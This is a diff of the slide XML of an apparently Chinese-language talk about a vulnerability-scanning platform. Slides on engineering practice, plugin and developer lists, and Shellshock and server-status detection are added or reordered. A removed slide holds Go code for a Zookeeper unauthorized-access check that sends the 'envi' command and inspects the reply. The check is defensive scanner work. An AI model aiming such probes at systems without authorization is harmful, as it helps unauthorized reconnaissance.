+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058888494"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395209562"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9593,6 +9620,137 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F28DBC-0846-E247-A917-E72D5A120AE0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>工程效率实践</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87A4C522-7C6D-0F45-881A-F18BBFCCB300}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>git</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>作为版本控制工具</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>单测一定要补全</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Changelog</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>记得写</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>能上</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>docker</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>就上</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>docker</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058888494"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4715DE-A2E1-7B48-BF0A-ABA222B430ED}"/>
               </a:ext>
             </a:extLst>
@@ -10053,6 +10211,13 @@
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
               <a:t>破壳检测</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器状态检测</a:t>
             </a:r>
           </a:p>
         </p:txBody>

--- a/talk.pptx
+++ b/talk.pptx
@@ -16,16 +16,20 @@
     <p:sldId id="274" r:id="rId10"/>
     <p:sldId id="275" r:id="rId11"/>
     <p:sldId id="278" r:id="rId12"/>
-    <p:sldId id="261" r:id="rId13"/>
-    <p:sldId id="268" r:id="rId14"/>
-    <p:sldId id="270" r:id="rId15"/>
-    <p:sldId id="276" r:id="rId16"/>
-    <p:sldId id="277" r:id="rId17"/>
-    <p:sldId id="271" r:id="rId18"/>
-    <p:sldId id="272" r:id="rId19"/>
-    <p:sldId id="269" r:id="rId20"/>
-    <p:sldId id="262" r:id="rId21"/>
-    <p:sldId id="263" r:id="rId22"/>
+    <p:sldId id="279" r:id="rId13"/>
+    <p:sldId id="280" r:id="rId14"/>
+    <p:sldId id="281" r:id="rId15"/>
+    <p:sldId id="282" r:id="rId16"/>
+    <p:sldId id="261" r:id="rId17"/>
+    <p:sldId id="268" r:id="rId18"/>
+    <p:sldId id="270" r:id="rId19"/>
+    <p:sldId id="276" r:id="rId20"/>
+    <p:sldId id="277" r:id="rId21"/>
+    <p:sldId id="271" r:id="rId22"/>
+    <p:sldId id="272" r:id="rId23"/>
+    <p:sldId id="269" r:id="rId24"/>
+    <p:sldId id="262" r:id="rId25"/>
+    <p:sldId id="263" r:id="rId26"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -6557,7 +6561,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA2C099-DF49-D845-A9B2-5BCBCD4195B3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDA6432A-1F73-324E-9604-7274AC6380C0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6568,22 +6572,59 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4324797" y="125359"/>
+            <a:ext cx="2692454" cy="470544"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>核心模块精讲</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:t>前端展示</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7410A11B-BBBB-F648-8C76-4669F73E5D9C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="164386" y="664117"/>
+            <a:ext cx="10171416" cy="5529765"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688000681"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1697033998"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6615,7 +6656,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AD45B8-AA01-AD47-9029-FB3A2B849706}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9569AE0F-0C2E-EA45-A782-3E0E38C6B1DE}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6628,8 +6669,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="789139" y="275572"/>
-            <a:ext cx="9862785" cy="686518"/>
+            <a:off x="1396661" y="115084"/>
+            <a:ext cx="9237092" cy="604108"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -6637,431 +6678,46 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>Zk</a:t>
-            </a:r>
-            <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>弱密码检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+              <a:t>插件列表</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A29637-D4BD-5345-ACE1-2F0FACF550A2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671B9A53-8C3D-D044-B2DF-F3E169B56632}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1415441" y="1816274"/>
-            <a:ext cx="9862785" cy="4801314"/>
+            <a:off x="0" y="719192"/>
+            <a:ext cx="11078990" cy="6024883"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> (d *</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zookeeperUnauth</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) Check(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.TCPSend</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, []byte("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>envi</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>"), 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err == nil &amp;&amp; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(string(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>), "Environment") {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Sprintf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("zookeeper://%s", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = string(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Remarks</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Sprintf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>未授权访问，</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>s", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Remarks</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = append(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="文本框 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB99DB9-4634-1E48-B326-5CF4257E6E24}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1164921" y="1252603"/>
-            <a:ext cx="9983243" cy="646331"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>弱密码检测就是想</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器发送一些默认的密码，如果</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>有了响应，那么就可以判定改</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器存在弱密码泄露现象</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2605024454"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4204313785"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7093,7 +6749,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDADC13-86CB-9C45-B739-A64757DBD36D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7106,8 +6762,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="696716"/>
+            <a:off x="872678" y="110290"/>
+            <a:ext cx="9648059" cy="717123"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -7115,233 +6771,46 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Shell</a:t>
-            </a:r>
-            <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>破壳检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="文本框 6">
+              <a:t>开发者列表</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72084524-DB0D-144A-8471-B96E4A90F314}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10CD082-2644-8A4F-9268-F774C2856667}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="1315234"/>
-            <a:ext cx="9745876" cy="1938992"/>
+            <a:off x="0" y="827413"/>
+            <a:ext cx="10874744" cy="5920297"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>2014</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>年</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>9</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>月</a:t>
-            </a:r>
-            <a:r>
